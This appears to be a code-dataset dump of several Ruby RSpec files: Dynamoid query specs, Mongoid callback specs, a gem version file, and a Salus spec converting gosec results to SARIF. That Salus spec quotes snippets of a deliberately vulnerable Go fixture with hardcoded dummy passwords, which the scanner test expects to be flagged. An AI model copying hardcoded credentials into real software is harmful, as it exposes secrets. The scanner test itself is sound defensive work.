Dynamoid.adapter.put_item(class_with_not_declared_field.table_name, id: '2', dob: '2001-03-14')
objects = class_with_not_declared_field.find(%w[1 2])
expect(objects.size).to eql 2
expect(objects.map(&:id)).to contain_exactly('1', '2')
end
end
context 'backoff is specified' do
before do
@old_backoff = Dynamoid.config.backoff
@old_backoff_strategies = Dynamoid.config.backoff_strategies.dup
@counter = 0
Dynamoid.config.backoff_strategies[:simple] = ->(_) { -> { @counter += 1 } }
Dynamoid.config.backoff = { simple: nil }
end
after do
Dynamoid.config.backoff = @old_backoff
Dynamoid.config.backoff_strategies = @old_backoff_strategies
end
it 'returns items' do
users = (1..10).map { User.create }
results = User.find(users.map(&:id))
expect(results).to match_array(users)
end
it 'raise RecordNotFound error when there are no results' do
User.create_table
expect {
User.find(['some-fake-id'])
}.to raise_error(Dynamoid::Errors::RecordNotFound)
end
it 'uses specified backoff when some items are not processed' do
# batch_get_item has following limitations:
# * up to 100 items at once
# * up to 16 MB at once
#
# So we write data as large as possible and read it back
# 100 * 400 KB (limit for item) = ~40 MB
# 40 MB / 16 MB = 3 times
ids = (1..100).map(&:to_s)
users = ids.map do |id|
name = ' ' * (400.kilobytes - 120) # 400KB - length(attribute names)
User.create(id: id, name: name)
end
results = User.find(users.map(&:id))
expect(results).to match_array(users)
expect(@counter).to eq 2
end
it 'uses new backoff after successful call without unprocessed items' do
skip 'it is difficult to test'
end
end
end
end
it 'sends consistent option to the adapter' do
expect(Dynamoid.adapter).to receive(:get_item)
.with(anything, anything, hash_including(consistent_read: true))
.and_call_original
Address.find(address.id, consistent_read: true)
end
context 'with users' do
it 'finds using method_missing for attributes' do
array = Address.find_by_city('Chicago')
expect(array).to eq address
end
it 'finds using method_missing for multiple attributes' do
user = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name_and_email('Josh', '[email protected]').to_a
expect(array).to eq [user]
end
it 'finds using method_missing for single attributes and multiple results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name('Josh').to_a
expect(array.size).to eq 2
expect(array).to include user1
expect(array).to include user2
end
it 'finds using method_missing for multiple attributes and multiple results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Josh', email: '[email protected]')
array = User.find_all_by_name_and_email('Josh', '[email protected]').to_a
expect(array.size).to eq 2
expect(array).to include user1
expect(array).to include user2
end
it 'finds using method_missing for multiple attributes and no results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Justin', email: '[email protected]')
array = User.find_all_by_name_and_email('Gaga', '[email protected]').to_a
expect(array).to be_empty
end
it 'finds using method_missing for a single attribute and no results' do
user1 = User.create(name: 'Josh', email: '[email protected]')
user2 = User.create(name: 'Justin', email: '[email protected]')
array = User.find_all_by_name('Gaga').to_a
expect(array).to be_empty
end
it 'should find on a query that is not indexed' do
user = User.create(password: 'Test')
array = User.find_all_by_password('Test').to_a
expect(array).to eq [user]
end
it 'should find on a query on multiple attributes that are not indexed' do
user = User.create(password: 'Test', name: 'Josh')
array = User.find_all_by_password_and_name('Test', 'Josh').to_a
expect(array).to eq [user]
end
it 'should return an empty array when fields exist but nothing is found' do
User.create_table
array = User.find_all_by_password('Test').to_a
expect(array).to be_empty
end
end
context 'find_all' do
it 'passes options to the adapter' do
pending 'This test is broken as we are overriding the consistent_read option to true inside the adapter'
user_ids = [%w[1 red], %w[1 green]]
Dynamoid.adapter.expects(:read).with(anything, user_ids, consistent_read: true)
User.find_all(user_ids, consistent_read: true)
end
end
describe '.find_all_by_secondary_index' do
def time_to_decimal(time)
BigDecimal(format('%d.%09d', time.to_i, time.nsec))
end
it 'returns exception if index could not be found' do
Post.create(post_id: 1, posted_at: Time.now)
expect do
Post.find_all_by_secondary_index(posted_at: Time.now.to_i)
end.to raise_exception(Dynamoid::Errors::MissingIndex)
end
context 'local secondary index' do
it 'queries the local secondary index' do
time = DateTime.now
p1 = Post.create(name: 'p1', post_id: 1, posted_at: time)
p2 = Post.create(name: 'p2', post_id: 1, posted_at: time + 1.day)
p3 = Post.create(name: 'p3', post_id: 2, posted_at: time)
posts = Post.find_all_by_secondary_index(
{ post_id: p1.post_id },
range: { name: 'p1' }
)
post = posts.first
expect(posts.count).to eql 1
expect(post.name).to eql 'p1'
expect(post.post_id).to eql '1'
end
end
context 'global secondary index' do
it 'can sort' do
time = DateTime.now
first_visit = Bar.create(name: 'Drank', visited_at: (time - 1.day).to_i)
Bar.create(name: 'Drank', visited_at: time.to_i)
last_visit = Bar.create(name: 'Drank', visited_at: (time + 1.day).to_i)
bars = Bar.find_all_by_secondary_index(
{ name: 'Drank' }, range: { 'visited_at.lte': (time + 10.days).to_i }
)
first_bar = bars.first
last_bar = bars.last
expect(bars.count).to eql 3
expect(first_bar.name).to eql first_visit.name
expect(first_bar.bar_id).to eql first_visit.bar_id
expect(last_bar.name).to eql last_visit.name
expect(last_bar.bar_id).to eql last_visit.bar_id
end
it 'honors :scan_index_forward => false' do
time = DateTime.now
first_visit = Bar.create(name: 'Drank', visited_at: time - 1.day)
Bar.create(name: 'Drank', visited_at: time)
last_visit = Bar.create(name: 'Drank', visited_at: time + 1.day)
different_bar = Bar.create(name: 'Junk', visited_at: time + 7.days)
bars = Bar.find_all_by_secondary_index(
{ name: 'Drank' }, range: { 'visited_at.lte': (time + 10.days).to_i },
scan_index_forward: false
)
first_bar = bars.first
last_bar = bars.last
expect(bars.count).to eql 3
expect(first_bar.name).to eql last_visit.name
expect(first_bar.bar_id).to eql last_visit.bar_id
expect(last_bar.name).to eql first_visit.name
expect(last_bar.bar_id).to eql first_visit.bar_id
end
it 'queries gsi with hash key' do
time = DateTime.now
p1 = Post.create(post_id: 1, posted_at: time, length: '10')
p2 = Post.create(post_id: 2, posted_at: time, length: '30')
p3 = Post.create(post_id: 3, posted_at: time, length: '10')
posts = Post.find_all_by_secondary_index(length: '10')
expect(posts.map(&:post_id).sort).to eql %w[1 3]
end
it 'queries gsi with hash and range key' do
time = Time.now
p1 = Post.create(post_id: 1, posted_at: time, name: 'post1')
p2 = Post.create(post_id: 2, posted_at: time + 1.day, name: 'post1')
p3 = Post.create(post_id: 3, posted_at: time, name: 'post3')
posts = Post.find_all_by_secondary_index(
{ name: 'post1' },
range: { posted_at: time_to_decimal(time) }
)
expect(posts.map(&:post_id).sort).to eql ['1']
end
end
describe 'custom range queries' do
describe 'string comparisons' do
it 'filters based on begins_with operator' do
time = DateTime.now
Post.create(post_id: 1, posted_at: time, name: 'fb_post')
Post.create(post_id: 1, posted_at: time + 1.day, name: 'blog_post')
posts = Post.find_all_by_secondary_index(
{ post_id: '1' }, range: { 'name.begins_with': 'blog_' }
)
expect(posts.map(&:name)).to eql ['blog_post']
end
end
describe 'numeric comparisons' do
before(:each) do
@time = DateTime.now
p1 = Post.create(post_id: 1, posted_at: @time, name: 'post')
p2 = Post.create(post_id: 2, posted_at: @time + 1.day, name: 'post')
p3 = Post.create(post_id: 3, posted_at: @time + 2.days, name: 'post')
end
it 'filters based on gt (greater than)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.gt': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql ['3']
end
it 'filters based on lt (less than)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.lt': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql ['1']
end
it 'filters based on gte (greater than or equal to)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.gte': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql %w[2 3]
end
it 'filters based on lte (less than or equal to)' do
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.lte': time_to_decimal(@time + 1.day) }
)
expect(posts.map(&:post_id).sort).to eql %w[1 2]
end
it 'filters based on between operator' do
between = [time_to_decimal(@time - 1.day), time_to_decimal(@time + 1.5.day)]
posts = Post.find_all_by_secondary_index(
{ name: 'post' },
range: { 'posted_at.between': between }
)
expect(posts.map(&:post_id).sort).to eql %w[1 2]
end
end
end
end
end
| 34.944853 | 131 | 0.60484 |
ed692c39d8966fe17fae6e304001b25ca0f64f36 | 10,113 | require_relative '../../spec_helper'
require 'json'
require 'json-schema'
describe Sarif::GosecSarif do
describe '#parse_issue' do
let(:scanner) { Salus::Scanners::Gosec.new(repository: repo, config: {}) }
let(:path) { 'spec/fixtures/gosec/safe_goapp' }
before { scanner.run }
context 'scan report with duplicate vulnerabilities' do
let(:repo) { Salus::Repo.new(path) }
let(:path) { 'spec/fixtures/gosec/duplicate_entries' }
it 'should not include duplicate result entries' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
f = File.read("#{path}/report.json")
scan_report.log(f.to_s)
adapter = Sarif::GosecSarif.new(scan_report, path)
results = adapter.build_runs_object(true)["results"]
expect(results.size).to eq(3)
unique_results = Set.new
results.each do |result|
expect(unique_results.include?(result)).to eq(false)
unique_results.add(result)
end
end
it 'should not include duplicate rules' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
f = File.read('spec/fixtures/gosec/duplicate_entries/report.json')
scan_report.log(f.to_s)
adapter = Sarif::GosecSarif.new(scan_report, 'spec/fixtures/gosec/duplicate_entries')
rules = adapter.build_runs_object(true)["tool"][:driver]["rules"]
expect(rules.size).to eq(2)
unique_rules = Set.new
rules.each do |rule|
expect(unique_rules.include?(rule)).to eq(false)
unique_rules.add(rule)
end
end
end
describe '#sarif_level' do
context 'gosec severities' do
let(:path) { 'spec/fixtures/gosec/safe_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'are mapped to sarif levels' do
scan_report = Salus::ScanReport.new(scanner_name: "Gosec")
adapter = Sarif::GosecSarif.new(scan_report, path)
expect(adapter.sarif_level("MEDIUM")).to eq("error")
expect(adapter.sarif_level("HIGH")).to eq("error")
expect(adapter.sarif_level("LOW")).to eq("warning")
end
end
end
context 'scan report with logged vulnerabilites' do
let(:path) { 'spec/fixtures/gosec/vulnerable_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'parses information correctly' do
gosec_sarif = Sarif::GosecSarif.new(scanner.report, path)
issue = JSON.parse(scanner.log(''))['Issues'][0]
# should Parse and fill out hash
expected = "7: func test2() {\n8: \tpassword := \"hhend77dyyydbh&^psNSSZ)JSM--_%\"\n9: "\
"\tfmt.Println(\"hello, from the vulnerable app\" + password)\n"
expect(gosec_sarif.parse_issue(issue)).to include(
id: "G101",
name: "CWE-798",
level: "HIGH",
details: "Potential hardcoded credentials \nSeverity: HIGH\nConfidence: LOW\nCWE: "\
"https://cwe.mitre.org/data/definitions/798.html",
messageStrings: { "severity": { "text": "HIGH" },
"confidence": { "text": "LOW" },
"cwe": { "text": "https://cwe.mitre.org/data/definitions/798.html" } },
start_line: 8,
start_column: 2,
help_url: "https://cwe.mitre.org/data/definitions/798.html",
uri: "hello.go",
properties: { severity: "HIGH" },
code: expected
)
end
end
end
describe '#sarif_report' do
let(:scanner) { Salus::Scanners::Gosec.new(repository: repo, config: {}) }
before { scanner.run }
context 'non go project' do
let(:repo) { Salus::Repo.new('spec/fixtures/blank_repository') }
it 'should handle generated error' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(false)
message = report_object['invocations'][0]['toolExecutionNotifications'][0]['message']
expect(message['text']).to include('0 lines of code were scanned')
end
end
context 'go project with no vulnerabilities' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/safe_goapp') }
it 'should generate an empty sarif report' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(true)
end
end
context 'go project with empty report containing whitespace' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/safe_goapp') }
it 'should handle empty reports with whitespace' do
report = Salus::Report.new(project_name: "Neon Genesis")
# Override the report.log() to return "\n"
report.class.send(:define_method, :log, -> { "\n" })
expect_any_instance_of(Sarif::GosecSarif).not_to receive(:bugsnag_notify)
report.add_scan_report(scanner.report, required: false)
report_object = JSON.parse(report.to_sarif)['runs'][0]
expect(report_object['invocations'][0]['executionSuccessful']).to eq(true)
end
end
context 'go project with errors' do
let(:repo) { Salus::Repo.new('spec/fixtures/gosec/malformed_goapp') }
it 'should parse golang errors' do
report = Salus::Report.new(project_name: "Neon Genesis")
report.add_scan_report(scanner.report, required: false)
sarif = JSON.parse(report.to_sarif({ 'include_non_enforced' => true }))
result = sarif["runs"][0]["results"][0]
rules = sarif["runs"][0]["tool"]["driver"]["rules"]
expect(rules[0]['id']).to eq('SAL002')
expect(rules[0]['name']).to eq('Golang Error')
expect(rules[0]['fullDescription']['text']).to eq("errors reported by scanner")
expect(rules[0]['helpUri']).to eq('https://github.com/coinbase/salus/blob/master/docs/salus_reports.md')
expect(result['ruleId']).to eq('SAL002')
expect(result['ruleIndex']).to eq(0)
expect(result['message']['text']).to eq('Pintl not declared by package fmt')
expect(result['level']).to eq('note')
expect(result['locations'][0]['physicalLocation']['region']['startLine']).to eq(8)
end
end
context 'go project with vulnerabilities' do
let(:path) { 'spec/fixtures/gosec/recursive_vulnerable_goapp' }
let(:repo) { Salus::Repo.new(path) }
it 'should generate the right results and rules' do
report = Salus::Report.new(project_name: "Neon Genesis", repo_path: path)
report.add_scan_report(scanner.report, required: false)
sarif = JSON.parse(report.to_sarif({ 'include_non_enforced' => true }))
result = sarif["runs"][0]["results"][0]
rules = sarif["runs"][0]["tool"]["driver"]["rules"]
# Check rule info
expect(rules[0]['id']).to eq('G101')
expect(rules[0]['name']).to eq('CWE-798')
expect(rules[0]['fullDescription']['text']).to eq("Potential hardcoded credentials "\
"\nSeverity: HIGH\nConfidence: LOW\nCWE: https://cwe.mitre.org/data/definitions/798.html")
expect(rules[0]['helpUri']).to eq('https://cwe.mitre.org/data/definitions/798.html')
# Check result info
expect(result['ruleId']).to eq('G101')
expect(result['ruleIndex']).to eq(0)
expect(result['level']).to eq('error')
expect(result['locations'][0]['physicalLocation']['region']['startLine']).to eq(8)
expect(result['locations'][0]['physicalLocation']['region']['startColumn']).to eq(2)
expected = "7: func main() {\n8: \tpassword := \"hhend77dyyydbh&^psNSSZ)JSM--_%\"\n9: "\
"\tfmt.Println(\"hello, from the vulnerable app\" + password)\n"
snippet = result['locations'][0]['physicalLocation']['region']['snippet']['text'].to_s
expect(snippet).to eq(expected)
end
end
end
describe 'sarif diff' do
context 'git diff support' do
it 'should find code in git diff' do
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_1.txt'
snippet = "6: username := \"admin\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be true
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be true
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin123\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\""
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be false
git_diff_file = 'spec/fixtures/sarifs/diff/git_diff_2.txt'
snippet = "6: username := \"admin123\"\n7: var password = " \
"\"f62e5bcda4fae4f82370da0c6f20697b8f8447ef\"\n8: \n"
git_diff = File.read(git_diff_file)
new_lines_in_git_diff = Sarif::BaseSarif.new_lines_in_git_diff(git_diff)
r = Sarif::GosecSarif.snippet_possibly_in_git_diff?(snippet, new_lines_in_git_diff)
expect(r).to be false
end
end
end
end
| 45.968182 | 112 | 0.632849 |
f838ec18911f83f70882becd6bd79e97bf7d53c8 | 47 | module PhgSudokuSolver
VERSION = "0.0.2"
end
| 11.75 | 22 | 0.723404 |
267c386a7a85403ae5edd5d53c58bfe1cfc976be | 54,111 | # frozen_string_literal: true
require "spec_helper"
require_relative './interceptable_spec_models'
describe Mongoid::Interceptable do
class TestClass
include Mongoid::Interceptable
attr_reader :before_save_called, :after_save_called
before_save do |object|
@before_save_called = true
end
after_save do |object|
@after_save_called = true
end
end
describe ".included" do
let(:klass) do
TestClass
end
it "includes the before_create callback" do
expect(klass).to respond_to(:before_create)
end
it "includes the after_create callback" do
expect(klass).to respond_to(:after_create)
end
it "includes the before_destroy callback" do
expect(klass).to respond_to(:before_destroy)
end
it "includes the after_destroy callback" do
expect(klass).to respond_to(:after_destroy)
end
it "includes the before_save callback" do
expect(klass).to respond_to(:before_save)
end
it "includes the after_save callback" do
expect(klass).to respond_to(:after_save)
end
it "includes the before_update callback" do
expect(klass).to respond_to(:before_update)
end
it "includes the after_update callback" do
expect(klass).to respond_to(:after_update)
end
it "includes the before_validation callback" do
expect(klass).to respond_to(:before_validation)
end
it "includes the after_validation callback" do
expect(klass).to respond_to(:after_validation)
end
it "includes the after_initialize callback" do
expect(klass).to respond_to(:after_initialize)
end
it "includes the after_build callback" do
expect(klass).to respond_to(:after_build)
end
end
describe ".after_find" do
let!(:player) do
Player.create!
end
context "when the callback is on a root document" do
context "when when the document is instantiated" do
it "does not execute the callback" do
expect(player.impressions).to eq(0)
end
end
context "when the document is found via #find" do
let(:from_db) do
Player.find(player.id)
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is found in a criteria" do
let(:from_db) do
Player.where(id: player.id).first
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is reloaded" do
let(:from_db) do
Player.find(player.id)
end
before do
from_db.reload
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
end
context "when the callback is on an embedded document" do
let!(:implant) do
player.implants.create!
end
context "when when the document is instantiated" do
it "does not execute the callback" do
expect(implant.impressions).to eq(0)
end
end
context "when the document is found via #find" do
let(:from_db) do
Player.find(player.id).implants.first
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
context "when the document is found in a criteria" do
let(:from_db) do
Player.find(player.id).implants.find(implant.id)
end
it "executes the callback" do
expect(from_db.impressions).to eq(1)
end
end
end
end
describe ".after_initialize" do
let(:game) do
Game.new
end
it "runs after document instantiation" do
expect(game.name).to eq("Testing")
end
context 'when the document is embedded' do
after do
Book.destroy_all
end
let(:book) do
book = Book.new({
:pages => [
{
content: "Page 1",
notes: [
{ message: "Page 1 / Note A" },
{ message: "Page 1 / Note B" }
]
},
{
content: "Page 2",
notes: [
{ message: "Page 2 / Note A" },
{ message: "Page 2 / Note B" }
]
}
]
})
book.id = '123'
book.save
book
end
let(:new_message) do
'Note C'
end
before do
book.pages.each do | page |
page.notes.destroy_all
page.notes.new(message: new_message)
page.save
end
end
let(:expected_messages) do
book.reload.pages.reduce([]) do |messages, p|
messages += p.notes.reduce([]) do |msgs, n|
msgs << n.message
end
end
end
it 'runs the callback on the embedded documents and saves the parent document' do
expect(expected_messages.all? { |m| m == new_message }).to be(true)
end
end
end
describe ".after_build" do
let(:weapon) do
Player.new(frags: 5).weapons.build
end
it "runs after document build (references_many)" do
expect(weapon.name).to eq("Holy Hand Grenade (5)")
end
let(:implant) do
Player.new(frags: 5).implants.build
end
it "runs after document build (embeds_many)" do
expect(implant.name).to eq('Cochlear Implant (5)')
end
let(:powerup) do
Player.new(frags: 5).build_powerup
end
it "runs after document build (references_one)" do
expect(powerup.name).to eq("Quad Damage (5)")
end
let(:augmentation) do
Player.new(frags: 5).build_augmentation
end
it "runs after document build (embeds_one)" do
expect(augmentation.name).to eq("Infolink (5)")
end
end
describe ".before_create" do
let(:artist) do
Artist.new(name: "Depeche Mode")
end
context "callback returns true" do
before do
expect(artist).to receive(:before_create_stub).once.and_return(true)
artist.save
end
it "gets saved" do
expect(artist.persisted?).to be true
end
end
context "callback aborts the callback chain" do
before do
Artist.before_create(:before_create_fail_stub)
expect(artist).to receive(:before_create_fail_stub).once.and_call_original
artist.save
end
after do
Artist.reset_callbacks(:create)
end
it "does not get saved" do
expect(artist.persisted?).to be false
end
end
end
describe ".before_save" do
context "when creating" do
let(:artist) do
Artist.new(name: "Depeche Mode")
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_save_stub).once.and_return(true)
end
it "the save returns true" do
expect(artist.save).to be true
end
end
context "when callback halts the callback chain" do
before do
Artist.before_save(:before_save_fail_stub)
end
after do
Artist.reset_callbacks(:save)
end
it "the save returns false" do
expect(artist).to receive(:before_save_fail_stub).once.and_call_original
expect(artist.save).to be false
end
end
end
context "when updating" do
let(:artist) do
Artist.create!(name: "Depeche Mode").tap do |artist|
artist.name = "The Mountain Goats"
end
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_update_stub).once.and_return(true)
end
it "the save returns true" do
expect(artist.save).to be true
end
end
context "when the callback halts the callback chain" do
before do
Artist.before_update(:before_update_fail_stub)
end
after do
Artist.reset_callbacks(:update)
end
it "the save returns false" do
expect(artist).to receive(:before_update_fail_stub).once.and_call_original
expect(artist.save).to be false
end
end
end
end
describe ".before_destroy" do
let(:artist) do
Artist.create!(name: "Depeche Mode")
end
before do
artist.name = "The Mountain Goats"
end
after do
artist.delete
end
context "when the callback returns true" do
before do
expect(artist).to receive(:before_destroy_stub).once.and_return(true)
end
it "the destroy returns true" do
expect(artist.destroy).to be true
end
end
context "when the callback halts the callback chain" do
before do
Artist.before_destroy(:before_destroy_fail_stub)
end
after do
Artist.reset_callbacks(:destroy)
end
it "the destroy returns false" do
expect(artist).to receive(:before_destroy_fail_stub).once.and_call_original
expect(artist.destroy).to be false
end
end
context "when cascading callbacks" do
let!(:moderat) do
Band.create!(name: "Moderat")
end
let!(:record) do
moderat.records.create(name: "Moderat")
end
before do
moderat.destroy
end
it "executes the child destroy callbacks" do
expect(record.before_destroy_called).to be true
end
end
end
describe "#run_after_callbacks" do
let(:object) do
TestClass.new
end
before do
object.run_after_callbacks(:save)
end
it "runs the after callbacks" do
expect(object.after_save_called).to be true
end
it "does not run the before callbacks" do
expect(object.before_save_called).to be nil
end
end
describe "#run_before_callbacks" do
let(:object) do
TestClass.new
end
before do
object.run_before_callbacks(:save)
end
it "runs the before callbacks" do
expect(object.before_save_called).to be true
end
it "does not run the after callbacks" do
expect(object.after_save_called).to be nil
end
end
context "when cascading callbacks" do
context "when the parent has a custom callback" do
context "when the child does not have the same callback defined" do
let(:exhibition) do
Exhibition.new
end
let!(:exhibitor) do
exhibition.exhibitors.build
end
context "when running the callbacks directly" do
before(:all) do
Exhibition.define_model_callbacks(:rearrange)
Exhibition.after_rearrange { }
end
after(:all) do
Exhibition.reset_callbacks(:rearrange)
end
it "does not cascade to the child" do
expect(exhibition.run_callbacks(:rearrange)).to be true
end
end
context "when the callbacks get triggered by a destroy" do
let(:band) do
Band.new
end
let!(:record) do
band.records.build
end
before(:all) do
Band.define_model_callbacks(:rearrange)
Band.set_callback(:validation, :before) do
run_callbacks(:rearrange)
end
end
after(:all) do
# ActiveSupport may raise an error when trying to reset callbacks on all of Band's
# descendants, regardless of whether they have a particular callback defined.
begin; Band.reset_callbacks(:rearrange); rescue; end
end
let(:attributes) do
{
records_attributes: {
"0" => { "_id" => record.id, "_destroy" => true }
}
}
end
it "does not cascade to the child" do
Band.accepts_nested_attributes_for :records, allow_destroy: true
expect(band.update_attributes(attributes)).to be true
end
end
end
end
context "when a document can exist in more than 1 level" do
let(:band) do
Band.new
end
let(:record) do
band.records.build
end
let(:note) do
Note.new
end
context "when adding the document at multiple levels" do
before do
band.notes.push(note)
record.notes.push(note)
end
context "when saving the root" do
it "only executes the callbacks once for each embed" do
expect(note).to receive(:update_saved).twice
band.save
end
end
end
end
context "when cascading after initialize" do
let!(:person) do
Person.create!
end
before do
person.services.create!(sid: 1)
end
it "doesn't cascade the initialize" do
expect_any_instance_of(Service).to receive(:after_initialize_called=).never
expect(Person.find(person.id)).to eq(person)
end
end
context "when attempting to cascade on a referenced relation" do
it "raises an error" do
expect {
Band.has_and_belongs_to_many :tags, cascade_callbacks: true
}.to raise_error(Mongoid::Errors::InvalidRelationOption)
end
end
context "when the documents are embedded one level" do
describe "#after_create" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_create_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
label.after_create_called = false
band.save
end
it "does not execute the callback" do
expect(label.after_create_called).to be false
end
end
end
describe "#after_save" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_save_called).to be true
end
end
end
describe "#after_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
context "when the child is dirty" do
let!(:label) do
band.create_label(name: "Mute")
end
before do
label.name = "Nothing"
band.save
end
it "executes the callback" do
expect(label.after_update_called).to be true
end
end
context "when the child is not dirty" do
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "does not execute the callback" do
expect(label.after_update_called).to be false
end
end
end
end
describe "#after_validation" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.build_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:label) do
band.create_label(name: "Mute")
end
before do
band.save
end
it "executes the callback" do
expect(label.after_validation_called).to be true
end
end
end
describe "#before_create" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_create_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_create_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
record.before_create_called = false
band.save
end
it "does not execute the callback" do
expect(record.before_create_called).to be false
end
end
end
describe "#before_save" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
end
context "when the child is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.create(name: "Moderat")
end
before do
band.save
end
it "executes the callback" do
expect(record.before_save_called).to be true
end
it "persists the change" do
expect(band.reload.records.first.before_save_called).to be true
end
end
context "when the child is created" do
let!(:band) do
Band.create
end
let!(:label) do
band.create_label(name: 'Label')
end
it "only executes callback once" do
expect(label.before_save_count).to be 1
end
end
end
describe "#before_update" do
context "when the child is new" do
context "when the parent is new" do
let(:band) do
Band.new(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
context "when the parent is persisted" do
let(:band) do
Band.create(name: "Moderat")
end
let!(:record) do
band.records.build(name: "Moderat")
end
before do
band.save
end
it "does not execute the callback" do
expect(record.before_update_called).to be false
end
end
end
